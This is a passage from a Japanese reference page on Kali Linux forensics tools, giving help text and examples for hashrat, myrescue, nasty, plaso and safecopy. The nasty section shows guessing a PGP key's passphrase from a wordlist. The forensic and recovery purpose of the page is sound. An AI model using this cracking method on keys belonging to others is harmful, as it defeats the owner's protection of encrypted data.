-bsd Output hashes in bsdsum format
-tag Output hashes in bsdsum format
--tag Output hashes in bsdsum format
-r Recurse into directories when hashing files
-hid Show hidden (starting with .) files
-hidden Show hidden (starting with .) files
-f <listfile> Hash files listed in <listfile>
-i <patterns> Only hash items matching a comma-seperated list of shell patterns
-x <patterns> Exclude items matching a comma-sepearted list of shell patterns
-X <file> Exclude items matching shell patters stored in <file>
-name <patterns> Only hash items matching a comma-seperated list of shell patterns (-name aka 'find')
-mtime <days> Only hash items <days> old. Has the same format as the find command, e.g. -10 is younger than ten days, +10 is older than ten, and 10 is ten days old
-mmin <mins> Only hash items <min> minutes old. Has the same format as the find command, e.g. -10 is younger than ten mins, +10 is older than ten, and 10 is ten mins old
-myear <years> Only hash items <years> old. Has the same format as the find command, e.g. -10 is younger than ten years, +10 is older than ten, and 10 is ten years old
-exec In CHECK or MATCH mode only examine executable files.
-dups Search for duplicate files.
-n <length> Truncate hashes to <length> bytes
-segment <length> Break hash up into segments of <length> chars seperated by '-'
-c CHECK hashes against list from file (or stdin)
-cf CHECK hashes against list but only show failures
-C <dir> Recursively CHECK directory against list of files on stdin
-Cf <dir> Recursively CHECK directory against list but only show failures
-m MATCH files from a list read from stdin.
-lm Read hashes from stdin, upload them to a memcached server (requires the -memcached option).
-memcached <server> Specify memcached server. (Overrides reading list from stdin if used with -m, -c or -cf).
-mcd <server> Specify memcached server. (Overrides reading list from stdin if used with -m, -c or -cf).
-h <script> Script to run when a file fails CHECK mode, or is found in MATCH mode.
-hook <script> Script to run when a file fails CHECK mode, or is found in FIND mode
-color Use ANSI color codes on output when checking hashes.
-strict Strict mode: when checking, check file mtime, owner, group, and inode as well as it\'s hash
-S Strict mode: when checking, check file mtime, owner, group, and inode as well as it\'s hash
-d dereference (follow) symlinks
-fs Stay on one file system
-dir DirMode: Read all files in directory and create one hash for them!
-dirmode DirMode: Read all files in directory and create one hash for them!
-devmode DevMode: read from a file EVEN OF IT\'S A DEVNODE
-lines Read lines from stdin and hash each line independently.
-rawlines Read lines from stdin and hash each line independently, INCLUDING any trailing whitespace. (This is compatible with 'echo text | md5sum')
-rl Read lines from stdin and hash each line independently, INCLUDING any trailing whitespace. (This is compatible with 'echo text | md5sum')
-cgi Run in HTTP CGI mode
-cgi Run in HTTP CGI mode
-xdialog Run in 'xdialog' (zenity, yad or qarama) mode
-dialog-types <list> Specify a list of dialog commands and use the first found on the system. Default is 'yad,zenity,qarma'
-iprefix <prefix> String to prefix all input before hashing
-oprefix <prefix> Prefix to add to the front of output hashes
-net Treat 'file' arguments as either ssh or http URLs, and pull files over the network and then hash them (Allows hashing of files on remote machines).
URLs are in the format ssh://[username]:[password]@[host]:[port] or http://[username]:[password]@[host]:[port]..
-idfile <path> Path to an ssh private key file to use to authenticate INSTEAD OF A PASSWORD when pulling files via ssh.
-xattr Use eXtended file ATTRibutes. In hash mode, store hashes in the file attributes, in check mode compare against hashes stored in file attributes.
-txattr Use TRUSTED eXtended file ATTRibutes. In hash mode, store hashes in 'trusted' file attributes. 'trusted' attributes can only be read and written by root. Under freebsd this menas SYSTEM attributes.
-attrs comma-separated list of filesystem attribute names to be set to the value of the hash.
-cache Use hashes stored in 'user' xattr if they\'re younger than the mtime of the file. This speeds up outputting hashes.
-u <types> Update. In checking mode, update hashes for the files as you go. <types> is a comma-separated list of things to update, which can be 'xattr' 'memcached' or a file name. This will update these targets with the hash that was found at the time of checking.
-hide-input When reading data from stdin in linemode, set the terminal to not echo characters, thus hiding typed input.
-star-input When reading data from stdin in linemode replace characters with stars.
-xsel Update X11 clipboard and primary selections to the current hash. This works using Xterm command sequences. The xterm resource 'allowWindowOps' must be set to 'true' for this to work.
-clip Update X11 clipboard to the current hash. This works using the 'xsel', 'xclip' or 'pbcopy' commands, or if none of those are installed falls back to Xterm clipboard as in the '-xsel' option .
-qr Display the current hash as a qrcode. This requires the 'qrencode' command to be installed, and also an image viewer like fim, feh, or imagemagick display to be installed.
-qrcode Display the current hash as a qrcode. This requires the 'qrencode' command to be installed, and also an image viewer like fim, feh, or imagemagick display to be installed.
-clipcmd <cmds> Comma separated list of clipboard-setter commands to use instead of the defaults.
-viewcmd <cmds> Comma separated list of image-viewer commands to use instead of the defaults.
■ 使用例
# 標準入力からハッシュ値を計算
root@kali:~# echo "Hello World" | hashrat -sha256 -lines
a591a6d40bf420404a011733cfb7b190d62c65bf0bcda32b57b277d9ad9f146e
# ファイルのハッシュ値を計算
root@kali:~# hashrat -sha256 hello.php
hash='sha256:cbae314ce52ca82874640b8a05d24d425ae492b29cb3d6c91495611a1b14031a' type='file' mode='100644' uid='0' gid='0' size='14302' mtime='1728724641' inode='693032' path='hello.php'
# ハッシュ値が一致するファイルを検索
root@kali:~# echo "5916afc5ff0a1573922cb50195f8438417b1757f8d40b337257e0f7a8544a3a9" | hashrat -sha256 -m -r .
LOCATED: 5916afc5ff0a1573922cb50195f8438417b1757f8d40b337257e0f7a8544a3a9 at Plugin/AbstractPluginManager.php
myrescue
破損したハードディスク、CD-ROM、DVD、フラッシュドライブなどから読み取り可能なデータを別のファイルまたはブロックデバイスにコピーします。
■ 使用方法
root@kali:~# myrescue -h
myrescue [<options>] <input-file> <output-file>
options:
-b <block-size> block size in bytes, default: 4096
-B <bitmap-file> bitmap-file, default: <output-file>.bitmap
-A abort on error
-S skip errors (exponential-step)
-f <number> skip blocks with <number> or more failures
-r <retry-count> try up to <retry-count> reads per block, default: 1
-s <start-block> start block number, default: 0
-e <end-block> end block number (excl.), default: size of <input-file>
-G <range> only read <range> blocks around good ones
-F <range> skip <range> blocks around failed ones
-J <number> randomly jump after reading a few sectors
-T make -A, -S and -F avoid blocks that took long to read
-R reverse copy direction
-U <dev-file> USB device reset after read error
(something like /dev/bus/usb/XXX/XXX !)
-h, -? usage information
■ 使用例
# エラーセクターを挿入したブロックデバイスを作成
root@kali:~# dmsetup create baddevice << EOF
0 2000 linear /dev/loop0 0
2000 96 error
2096 202704 linear /dev/loop0 2096
EOF
# エラーのあるデバイスをイメージにコピー
root@kali:~# myrescue /dev/mapper/baddevice backup.img
block 000000250 (000000000-000025600, 0.98%) ok 000000250 bad 000000000 src read failed: Input/output error
block 000000251 (000000000-000025600, 0.98%) ok 000000250 bad 000000001 src read failed: Input/output error
block 000000252 (000000000-000025600, 0.98%) ok 000000250 bad 000000002 src read failed: Input/output error
block 000000253 (000000000-000025600, 0.99%) ok 000000250 bad 000000003 src read failed: Input/output error
block 000000254 (000000000-000025600, 0.99%) ok 000000250 bad 000000004 src read failed: Input/output error
block 000000255 (000000000-000025600, 1.00%) ok 000000250 bad 000000005 src read failed: Input/output error
block 000000256 (000000000-000025600, 1.00%) ok 000000250 bad 000000006 src read failed: Input/output error
block 000000257 (000000000-000025600, 1.00%) ok 000000250 bad 000000007 src read failed: Input/output error
block 000000258 (000000000-000025600, 1.01%) ok 000000250 bad 000000008 src read failed: Input/output error
block 000000259 (000000000-000025600, 1.01%) ok 000000250 bad 000000009 src read failed: Input/output error
block 000000260 (000000000-000025600, 1.02%) ok 000000250 bad 000000010 src read failed: Input/output error
block 000000261 (000000000-000025600, 1.02%) ok 000000250 bad 000000011 src read failed: Input/output error
block 000025600 (000000000-000025600, 100.00%) ok 000025588 bad 000000012
Nasty
PGPやGPGキーのパスフレーズを復元します。
■ 使用方法
root@kali:~# nasty -h
-a x set minimum length of passphrase
-b x set maximum length
-m x set guessing mode:
incremental: try them all
random: try at random
file: read phrases from file (use -i)
-i x file to read the passphrases from
-f x file to write the found passphrase to
-c x... charset, one or more from the following:
a: a-z
A: A-Z
0: 0-9
.: all ascii values (32...126)
+: 32...255 (default(!))
-k x filter string to select a key
-v enable verbose mode
■ 使用例
root@kali:~# nasty -i words.txt -m file 515E70E3B3F1E8664434FCEFCC19168AB4CF9036
Using CC19168AB4CF9036: prograti <test@example.com>
OK
Passphrase is: hello
Plaso
様々なログファイルや、コンピューターやネットワーク機器などの関連システムからのフォレンジックアーチファクトを解析し、一つの相関したタイムラインを作成します。
■ 使用方法
root@kali:~# log2timeline --help
usage: log2timeline.py [-h] [--troubles] [-V] [--artifact_definitions PATH] [--custom_artifact_definitions PATH] [--data PATH]
[--archives TYPES] [--artifact_filters ARTIFACT_FILTERS] [--artifact_filters_file PATH] [--extract_winreg_binary]
[--preferred_year YEAR] [--skip_compressed_streams] [-f FILE_FILTER] [--hasher_file_size_limit SIZE]
[--hashers HASHER_LIST] [--parsers PARSER_FILTER_EXPRESSION] [--yara_rules PATH] [--partitions PARTITIONS]
[--volumes VOLUMES] [--codepage CODEPAGE] [--language LANGUAGE_TAG] [--no_extract_winevt_resources] [-z TIME_ZONE]
[--no_vss] [--vss_only] [--vss_stores VSS_STORES] [--credential TYPE:DATA] [-d] [-q] [-u] [--info] [--use_markdown]
[--no_dependencies_check] [--logfile FILENAME] [--status_view TYPE] [--status_view_file PATH]
[--status_view_interval SECONDS] [--buffer_size BUFFER_SIZE] [--queue_size QUEUE_SIZE] [--single_process]
[--process_memory_limit SIZE] [--temporary_directory DIRECTORY] [--vfs_back_end TYPE] [--worker_memory_limit SIZE]
[--worker_timeout MINUTES] [--workers WORKERS] [--sigsegv_handler] [--profilers PROFILERS_LIST]
[--profiling_directory DIRECTORY] [--profiling_sample_rate SAMPLE_RATE] [--storage_file PATH] [--storage_format FORMAT]
[--task_storage_format FORMAT]
[SOURCE]
positional arguments:
SOURCE Path to a source device, file or directory. If the source is a supported storage media device or image file, archive
file or a directory, the files within are processed recursively.
options:
-h, --help Show this help message and exit.
--troubles Show troubleshooting information.
-V, --version Show the version information.
data location arguments:
--artifact_definitions PATH, --artifact-definitions PATH
Path to a directory or file containing artifact definitions, which are .yaml files. Artifact definitions can be used
to describe and quickly collect data of interest, such as specific files or Windows Registry keys.
--custom_artifact_definitions PATH, --custom-artifact-definitions PATH
Path to a directory or file containing custom artifact definitions, which are .yaml files. Artifact definitions can be
used to describe and quickly collect data of interest, such as specific files or Windows Registry keys.
--data PATH Path to a directory containing the data files.
extraction arguments:
--archives TYPES Define a list of archive and storage media image types for which to process embedded file entries, such as TAR
(archive.tar) or ZIP (archive.zip). This is a comma separated list where each entry is the name of an archive type,
such as "tar,zip". "all" indicates that all archive types should be enabled. "none" disables processing file entries
embedded in archives. Use "--archives list" to list the available archive types. WARNING: this can make processing
significantly slower.
--artifact_filters ARTIFACT_FILTERS, --artifact-filters ARTIFACT_FILTERS
Names of forensic artifact definitions, provided on the command command line (comma separated). Forensic artifacts are
stored in .yaml files that are directly pulled from the artifact definitions project. You can also specify a custom
artifacts yaml file (see --custom_artifact_definitions). Artifact definitions can be used to describe and quickly
collect data of interest, such as specific files or Windows Registry keys.
--artifact_filters_file PATH, --artifact-filters_file PATH
Names of forensic artifact definitions, provided in a file with one artifact name per line. Forensic artifacts are
stored in .yaml files that are directly pulled from the artifact definitions project. You can also specify a custom
artifacts yaml file (see --custom_artifact_definitions). Artifact definitions can be used to describe and quickly
collect data of interest, such as specific files or Windows Registry keys.
--extract_winreg_binary, --extract-winreg-binary
Extract binary Windows Registry values. WARNING: This can make processing significantly slower.
--preferred_year YEAR, --preferred-year YEAR
When a format\'s timestamp does not include a year, e.g. syslog, use this as the initial year instead of attempting
auto-detection.
--skip_compressed_streams, --skip-compressed-streams
Skip processing file content within compressed streams, such as syslog.gz and syslog.bz2.
-f FILE_FILTER, --filter-file FILE_FILTER, --filter_file FILE_FILTER, --file-filter FILE_FILTER, --file_filter FILE_FILTER
List of files to include for targeted collection of files to parse, one line per file path, setup is /path|file -
where each element can contain either a variable set in the preprocessing stage or a regular expression.
--hasher_file_size_limit SIZE, --hasher-file-size-limit SIZE
Define the maximum file size in bytes that hashers should process. Any larger file will be skipped. A size of 0
represents no limit.
--hashers HASHER_LIST
Define a list of hashers to use by the tool. This is a comma separated list where each entry is the name of a hasher,
such as "md5,sha256". "all" indicates that all hashers should be enabled. "none" disables all hashers. Use "--hashers
list" or "--info" to list the available hashers.
--parsers PARSER_FILTER_EXPRESSION
Define which presets, parsers and/or plugins to use, or show possible values. The expression is a comma separated
string where each element is a preset, parser or plugin name. Each element can be prepended with an exclamation mark
to exclude the item. Matching is case insensitive. Examples: "linux,!bash_history" enables the linux preset, without
the bash_history parser. "sqlite,!sqlite/chrome_history" enables all sqlite plugins except for chrome_history.
"win7,syslog" enables the win7 preset, as well as the syslog parser. Use "--parsers list" or "--info" to list
available presets, parsers and plugins.
--yara_rules PATH, --yara-rules PATH
Path to a file containing Yara rules definitions.
--partitions PARTITIONS, --partition PARTITIONS
Define partitions to be processed. A range of partitions can be defined as: "3..5". Multiple partitions can be defined
as: "1,3,5" (a list of comma separated values). Ranges and lists can also be combined as: "1,3..5". The first
partition is 1. All partitions can be specified with: "all".
--volumes VOLUMES, --volume VOLUMES
Define volumes to be processed. A range of volumes can be defined as: "3..5". Multiple volumes can be defined as:
"1,3,5" (a list of comma separated values). Ranges and lists can also be combined as: "1,3..5". The first volume is 1.
All volumes can be specified with: "all".
--codepage CODEPAGE The preferred codepage, which is used for decoding single-byte or multi-byte character extracted strings.
--language LANGUAGE_TAG
The preferred language, which is used for extracting and formatting Windows EventLog message strings. Use "--language
list" to see a list of supported language tags. The en-US (LCID 0x0409) language is used as fallback if preprocessing
could not determine the system language or no language information is available in the winevt-rc.db database.
--no_extract_winevt_resources, --no-extract-winevt-resources
Do not extract Windows EventLog resources such as event message template strings. By default Windows EventLog
resources will be extracted when a Windows EventLog parser is enabled.
-z TIME_ZONE, --zone TIME_ZONE, --timezone TIME_ZONE
preferred time zone of extracted date and time values that are stored without a time zone indicator. The time zone is
determined based on the source data where possible otherwise it will default to UTC. Use "list" to see a list of
available time zones.
--no_vss, --no-vss Do not scan for Volume Shadow Snapshots (VSS). This means that Volume Shadow Snapshots (VSS) are not processed.
WARNING: this option is deprecated use --vss_stores=none instead.
--vss_only, --vss-only
Do not process the current volume if Volume Shadow Snapshots (VSS) have been selected.
--vss_stores VSS_STORES, --vss-stores VSS_STORES
Define Volume Shadow Snapshots (VSS) (or stores) that need to be processed. A range of snapshots can be defined as:
"3..5". Multiple snapshots can be defined as: "1,3,5" (a list of comma separated values). Ranges and lists can also be
combined as: "1,3..5". The first snapshot is 1. All snapshots can be defined as: "all" and no snapshots as: "none".
--credential TYPE:DATA
Define a credentials that can be used to unlock encrypted volumes e.g. BitLocker. The credential is defined as
type:data e.g. "password:BDE-test". Supported credential types are: key_data, password, recovery_password,
startup_key. Binary key data is expected to be passed in BASE-16 encoding (hexadecimal). WARNING credentials passed
via command line arguments can end up in logs, so use this option with care.
informational arguments:
-d, --debug Enable debug output.
-q, --quiet Disable informational output.
-u, --unattended Enable unattended mode and do not ask the user for additional input when needed, but terminate with an error instead.
--info Print out information about supported plugins and parsers.
--use_markdown, --use-markdown
Output lists in Markdown format use in combination with "--hashers list", "--parsers list" or "--timezone list"
--no_dependencies_check, --no-dependencies-check
Disable the dependencies check.
--logfile FILENAME, --log_file FILENAME, --log-file FILENAME
Path of the file in which to store log messages, by default this file will be named: "log2timeline-
YYYYMMDDThhmmss.log.gz". Note that the file will be gzip compressed if the extension is ".gz".
--status_view TYPE, --status-view TYPE
The processing status view mode: "file", "linear", "none" or "window".
--status_view_file PATH, --status-view-file PATH
The name of the status view file.
--status_view_interval SECONDS, --status-view-interval SECONDS
Number of seconds to update the status view.
processing arguments:
--buffer_size BUFFER_SIZE, --buffer-size BUFFER_SIZE, --bs BUFFER_SIZE
The buffer size for the output (defaults to 196MiB).
--queue_size QUEUE_SIZE, --queue-size QUEUE_SIZE
The maximum number of queued items per worker (defaults to 125000)
--single_process, --single-process
Indicate that the tool should run in a single process.
--process_memory_limit SIZE, --process-memory-limit SIZE
Maximum amount of memory (data segment) a process is allowed to allocate in bytes, where 0 represents no limit. The
default limit is 4294967296 (4 GiB). This applies to both the main (foreman) process and the worker processes. This
limit is enforced by the operating system and will supersede the worker memory limit (--worker_memory_limit).
--temporary_directory DIRECTORY, --temporary-directory DIRECTORY
Path to the directory that should be used to store temporary files created during processing.
--vfs_back_end TYPE, --vfs-back-end TYPE
The preferred dfVFS back-end: "auto", "fsext", "fsfat", "fshfs", "fsntfs", "tsk" or "vsgpt".
--worker_memory_limit SIZE, --worker-memory-limit SIZE
Maximum amount of memory (data segment and shared memory) a worker process is allowed to consume in bytes, where 0
represents no limit. The default limit is 2147483648 (2 GiB). If a worker process exceeds this limit it is killed by
the main (foreman) process.
--worker_timeout MINUTES, --worker-timeout MINUTES
Number of minutes before a worker process that is not providing status updates is considered inactive. The default
timeout is 15.0 minutes. If a worker process exceeds this timeout it is killed by the main (foreman) process.
--workers WORKERS Number of worker processes. The default is the number of available system CPUs minus one, for the main (foreman)
process.
--sigsegv_handler, --sigsegv-handler
Enables the SIGSEGV handler. WARNING this functionality is experimental and will a deadlock worker process if a real
segfault is caught, but not signal SIGSEGV. This functionality is therefore primarily intended for debugging purposes
profiling arguments:
--profilers PROFILERS_LIST
List of profilers to use by the tool. This is a comma separated list where each entry is the name of a profiler. Use "
--profilers list" to list the available profilers.
--profiling_directory DIRECTORY, --profiling-directory DIRECTORY
Path to the directory that should be used to store the profiling sample files. By default the sample files are stored
in the current working directory.
--profiling_sample_rate SAMPLE_RATE, --profiling-sample-rate SAMPLE_RATE
Profiling sample rate (defaults to a sample every 1000 files).
storage arguments:
--storage_file PATH, --storage-file PATH
The path of the storage file. If not specified, one will be made in the form <timestamp>-<source>.plaso
--storage_format FORMAT, --storage-format FORMAT
Format of the storage file, the default is: sqlite. Supported options: sqlite
--task_storage_format FORMAT, --task-storage-format FORMAT
Format for task storage, the default is: sqlite. Supported options: redis, sqlite
root@kali:~# pinfo --help
usage: pinfo.py [-h] [--troubles] [-V] [--logfile FILENAME] [--process_memory_limit SIZE] [--compare STORAGE_FILE] [--output_format FORMAT]
[--hash TYPE] [--report TYPE] [--sections SECTIONS_LIST] [-v] [-w OUTPUTFILE]
[PATH]
positional arguments:
PATH Path to a storage file.
options:
-h, --help Show this help message and exit.
--troubles Show troubleshooting information.
-V, --version Show the version information.
--logfile FILENAME, --log_file FILENAME, --log-file FILENAME
Path of the file in which to store log messages, by default this file will be named: "pinfo-YYYYMMDDThhmmss.log.gz".
Note that the file will be gzip compressed if the extension is ".gz".
--process_memory_limit SIZE, --process-memory-limit SIZE
Maximum amount of memory (data segment) a process is allowed to allocate in bytes, where 0 represents no limit. The
default limit is 4294967296 (4 GiB). This applies to both the main (foreman) process and the worker processes. This
limit is enforced by the operating system and will supersede the worker memory limit (--worker_memory_limit).
--compare STORAGE_FILE
The path of the storage file to compare against.
--output_format FORMAT, --output-format FORMAT
Format of the output, the default is: text. Supported options: json, markdown, text.
--hash TYPE Type of hash to output in file_hashes report. Supported options: md5, sha1, sha256
--report TYPE Report on specific information. Supported options: browser_search, chrome_extension, environment_variables,
file_hashes, list, none, windows_services, winevt_providers
--sections SECTIONS_LIST
List of sections to output. This is a comma separated list where each entry is the name of a section. Use "--sections
list" to list the available sections and "--sections all" to show all available sections.
-v, --verbose Print verbose output.
-w OUTPUTFILE, --write OUTPUTFILE
Output filename.
root@kali:~# psort --help
usage: psort.py [-h] [--troubles] [-V] [--analysis PLUGIN_LIST] [--process_memory_limit SIZE] [--temporary_directory DIRECTORY]
[--worker_memory_limit SIZE] [--worker_timeout MINUTES] [--logfile FILENAME] [-d] [-q] [-u] [--status_view TYPE]
[--status_view_file PATH] [--status_view_interval SECONDS] [--slice DATE_TIME] [--slice_size SLICE_SIZE] [--slicer]
[--data PATH] [-a] [--language LANGUAGE_TAG] [--additional_fields ADDITIONAL_FIELDS] [--custom_fields CUSTOM_FIELDS]
[--custom_formatter_definitions PATH] [--dynamic_time] [--output_time_zone TIME_ZONE] [-o FORMAT] [-w OUTPUT_FILE]
[--fields FIELDS] [--profilers PROFILERS_LIST] [--profiling_directory DIRECTORY] [--profiling_sample_rate SAMPLE_RATE]
[PATH] [FILTER]
positional arguments:
PATH Path to a storage file.
options:
-h, --help Show this help message and exit.
--troubles Show troubleshooting information.
-V, --version Show the version information.
Analysis Arguments:
--analysis PLUGIN_LIST
A comma separated list of analysis plugin names to be loaded or "--analysis list" to see a list of available plugins.
Processing:
--process_memory_limit SIZE, --process-memory-limit SIZE
Maximum amount of memory (data segment) a process is allowed to allocate in bytes, where 0 represents no limit. The
default limit is 4294967296 (4 GiB). This applies to both the main (foreman) process and the worker processes. This
limit is enforced by the operating system and will supersede the worker memory limit (--worker_memory_limit).
--temporary_directory DIRECTORY, --temporary-directory DIRECTORY
Path to the directory that should be used to store temporary files created during processing.
--worker_memory_limit SIZE, --worker-memory-limit SIZE
Maximum amount of memory (data segment and shared memory) a worker process is allowed to consume in bytes, where 0
represents no limit. The default limit is 2147483648 (2 GiB). If a worker process exceeds this limit it is killed by
the main (foreman) process.
--worker_timeout MINUTES, --worker-timeout MINUTES
Number of minutes before a worker process that is not providing status updates is considered inactive. The default
timeout is 15.0 minutes. If a worker process exceeds this timeout it is killed by the main (foreman) process.
Informational Arguments:
--logfile FILENAME, --log_file FILENAME, --log-file FILENAME
Path of the file in which to store log messages, by default this file will be named: "psort-YYYYMMDDThhmmss.log.gz".
Note that the file will be gzip compressed if the extension is ".gz".
-d, --debug Enable debug output.
-q, --quiet Disable informational output.
-u, --unattended Enable unattended mode and do not ask the user for additional input when needed, but terminate with an error instead.
--status_view TYPE, --status-view TYPE
The processing status view mode: "file", "linear", "none" or "window".
--status_view_file PATH, --status-view-file PATH
The name of the status view file.
--status_view_interval SECONDS, --status-view-interval SECONDS
Number of seconds to update the status view.
Filter Arguments:
--slice DATE_TIME Date and time to create a time slice around. This parameter, if defined, will display all events that happened X
minutes before and after the defined date, where X is controlled by the --slice_size option, which is 5 minutes by
default. The date and time must be specified in ISO 8601 format including time zone offset, for example:
20200619T20:09:23+02:00.
--slice_size SLICE_SIZE, --slice-size SLICE_SIZE
Defines the slice size. In the case of a regular time slice it defines the number of minutes the slice size should be.
In the case of the --slicer it determines the number of events before and after a filter match has been made that will
be included in the result set. The default value is 5. See --slice or --slicer for more details about this option.
--slicer Create a time slice around every filter match. This parameter, if defined will save all X events before and after a
filter match has been made. X is defined by the --slice_size parameter.
FILTER A filter that can be used to filter the dataset before it is written into storage. More information about the filters
and how to use them can be found here: https://plaso.readthedocs.io/en/latest/sources/user/Event-filters.html
Input Arguments:
--data PATH Path to a directory containing the data files.
Output Arguments:
-a, --include_all, --include-all
By default the psort removes duplicate entries from the output. This parameter changes that behavior so all events are
included.
--language LANGUAGE_TAG
The preferred language, which is used for extracting and formatting Windows EventLog message strings. Use "--language
list" to see a list of supported language tags. The en-US (LCID 0x0409) language is used as fallback if preprocessing
could not determine the system language or no language information is available in the winevt-rc.db database.
--additional_fields ADDITIONAL_FIELDS, --additional-fields ADDITIONAL_FIELDS
Defines additional fields to be included in the output besides the default fields. Multiple additional field names can
be defined as a list of comma separated values. Output formats that support additional fields are: dynamic, opensearch
and xlsx.
--custom_fields CUSTOM_FIELDS, --custom-fields CUSTOM_FIELDS
Defines custom fields to be included in the output besides the default fields. A custom field is defined as
"name:value". Multiple custom field names can be defined as list of comma separated values. Note that regular fields
will are favoured above custom fields with same name. Output formats that support this are: dynamic, opensearch and
xlsx.
--custom_formatter_definitions PATH, --custom-formatter-definitions PATH
Path to a file containing custom event formatter definitions, which is a .yaml file. Custom event formatter
definitions can be used to customize event messages and override the built-in event formatter definitions.
--dynamic_time, --dynamic-time
Indicate that the output should use dynamic time. Output formats that support dynamic time are: dynamic
--output_time_zone TIME_ZONE, --output-time-zone TIME_ZONE
time zone of date and time values written to the output, if supported by the output format. Use "list" to see a list
of available time zones. Output formats that support an output time zone are: dynamic and l2t_csv.
Output Format Arguments:
-o FORMAT, --output_format FORMAT, --output-format FORMAT
The output format. Use "-o list" to see a list of available output formats.
-w OUTPUT_FILE, --write OUTPUT_FILE
Output filename.
--fields FIELDS Defines which fields should be included in the output.
profiling arguments:
--profilers PROFILERS_LIST
List of profilers to use by the tool. This is a comma separated list where each entry is the name of a profiler. Use "
--profilers list" to list the available profilers.
--profiling_directory DIRECTORY, --profiling-directory DIRECTORY
Path to the directory that should be used to store the profiling sample files. By default the sample files are stored
in the current working directory.
--profiling_sample_rate SAMPLE_RATE, --profiling-sample-rate SAMPLE_RATE
Profiling sample rate (defaults to a sample every 1000 files).
■ 使用例
# バックアップイメージからタイムラインを作成
root@kali:~# log2timeline --storage_file backup.plaso backup.img
2024-11-04 06:52:23,446 [INFO] (MainProcess) PID:3496 <artifact_definitions> Determined artifact definitions path: /usr/share/artifacts
Checking availability and versions of dependencies.
[OPTIONAL] unable to determine version information for: flor
[OK]
[...]
Tasks: Queued Processing Merging Abandoned Total
0 0 0 0 62205
Identifier PID Status Memory Sources Event Data File
Main 3496 completed 231.6 MiB 62205 (0) 75571 (0)
Worker_00 3500 idle 124.6 MiB 10067 (0) 9968 (0) GZIP:/usr/share/doc/gzip/changelog.Debian.gz
Worker_01 3502 idle 143.4 MiB 11359 (0) 10532 (0) GZIP:/usr/share/man/man3/URI.3pm.gz
Worker_02 3506 idle 147.6 MiB 7170 (0) 11660 (0) GZIP:/usr/share/doc/php5-common/TODO.gz
Worker_03 3510 idle 126.9 MiB 8467 (0) 9194 (0) GZIP:/usr/share/fonts/X11/75dpi/courB12.pcf.gz
Worker_04 3514 idle 141.3 MiB 8527 (0) 12786 (0) GZIP:/usr/share/man/fr/man5/passwd.5.gz
Worker_05 3518 idle 129.1 MiB 6903 (0) 10948 (0) GZIP:/usr/share/fonts/X11/misc/10x20-ISO8859-14.pcf.gz
Worker_06 3522 idle 126.5 MiB 9711 (0) 10483 (0) GZIP:/usr/share/doc/libcairo2/AUTHORS.gz
Processing completed.
Number of warnings generated while extracting events: 401.
# どのような情報が抽出されたのかなどの情報を表示
root@kali:~# pinfo backup.plaso
[...]
******************************** Event sources *********************************
Total : 62205
--------------------------------------------------------------------------------
************************* Events generated per parser **************************
Parser (plugin) name : Number of events
--------------------------------------------------------------------------------
dpkg : 1342
filestat : 228584
olecf_default : 26
olecf_document_summary : 5
olecf_summary : 16
syslog_traditional : 10443
utmp : 1372
vsftpd : 103
Total : 241891
--------------------------------------------------------------------------------
[...]
# タイムラインからvsftpdのログで"CONNECT"というテキストが含まれるものを抽出
root@kali:~# psort -o json -w vsftpd-log.json backup.plaso "data_type is 'vsftpd:log' and text contains 'CONNECT'"
# JSONデータを整形して表示
root@kali:~# cat vsftpd-log.json | jq -r '. | to_entries[] | .value | { datetime: .date_time.time_elements_tuple | @text "\(.[0])-\(.[1])-\(.[2]) \(.[3]):\(.[4]):\(.[5])", message: .message } | @text "\(.datetime) - \(.message)"'
2024-10-29 14:36:41 - [pid 5207] CONNECT: Client "127.0.0.1"
2024-10-29 15:4:11 - [pid 5328] CONNECT: Client "192.168.11.3"
2024-10-29 15:12:37 - [pid 5767] CONNECT: Client "127.0.0.1"
2024-10-29 15:12:46 - [pid 5770] CONNECT: Client "127.0.0.1"
2024-10-29 15:13:10 - [pid 5784] CONNECT: Client "127.0.0.1"
2024-10-29 15:44:14 - [pid 5303] CONNECT: Client "127.0.0.1"
2024-10-29 15:48:53 - [pid 5278] CONNECT: Client "192.168.11.3"
Safecopy
破損したハードディスク、CD-ROM、DVD、フラッシュドライブなどから読み取り可能なデータを別のファイルまたはブロックデバイスにコピーします。
■ 使用方法
root@kali:~# safecopy --help
Usage: safecopy [options] <source> <target>
Options:
--stage1 : Preset to rescue most of the data fast,
using no retries and avoiding bad areas.
Presets: -f 10% -r 10% -R 1 -Z 0 -L 2 -M BaDbLoCk
-o stage1.badblocks
--stage2 : Preset to rescue more data, using no retries
but searching for exact ends of bad areas.
Presets: -f 128* -r 1* -R 1 -Z 0 -L 2
-I stage1.badblocks
-o stage2.badblocks
--stage3 : Preset to rescue everything that can be rescued
using maximum retries, head realignment tricks
and low level access.
Presets: -f 1* -r 1* -R 4 -Z 1 -L 2
-I stage2.badblocks
-o stage3.badblocks
All stage presets can be overridden by individual options.
-b <size> : Blocksize for default read operations.
Set this to the physical sectorsize of your media.
Default: 1*
Hardware block size if reported by OS, otherwise 4096
-f <size> : Blocksize when skipping over badblocks.
Higher settings put less strain on your hardware,
but you might miss good areas in between two bad ones.
Default: 16*
-r <size> : Resolution in bytes when searching for the exact
beginning or end of a bad area.
If you read data directly from a device there is no
need to set this lower than the hardware blocksize.
On mounted filesystems however, read blocks
and physical blocks could be misaligned.
Smaller values lead to very thorough attempts to read
data at the edge of damaged areas,
but increase the strain on the damaged media.
Default: 1*
-R <number> : At least that many read attempts are made on the first
bad block of a damaged area with minimum resolution.
More retries can sometimes recover a weak sector,
but at the cost of additional strain.
Default: 3
-Z <number> : On each error, force seek the read head from start to
end of the source device as often as specified.
That takes time, creates additional strain and might
not be supported by all devices or drivers.
Default: 1
-L <mode> : Use low level device calls as specified:
0 Do not use low level device calls
1 Attempt low level device calls
for error recovery only
2 Always use low level device calls
if available
Supported low level features in this version are:
SYSTEM DEVICE TYPE FEATURE
Linux cdrom/dvd bus/device reset
Linux cdrom read sector in raw mode
Linux floppy controller reset, twaddle
Default: 1
--sync : Use synchronized read calls (disable driver buffering).
Safecopy will use O_DIRECT if supported by the OS
and O_SYNC otherwise.
Default: Asynchronous read buffering by the OS is allowed
--forceopen : Keep trying to reopen the source after a read errer
useful for USB drives that go away temporarily.
Warning: This can cause safecopy to hang
until aborted manually!
Default: Abort on fopen() error
-s <blocks> : Start position where to start reading.
Will correspond to position 0 in the destination file.
Default: block 0
-l <blocks> : Maximum length of data to be read.
Default: Entire size of input file
-I <badblockfile> : Incremental mode. Assume the target file already
exists and has holes specified in the badblockfile.
It will be attempted to retrieve more data from
the listed blocks or from beyond the file size
of the target file only.
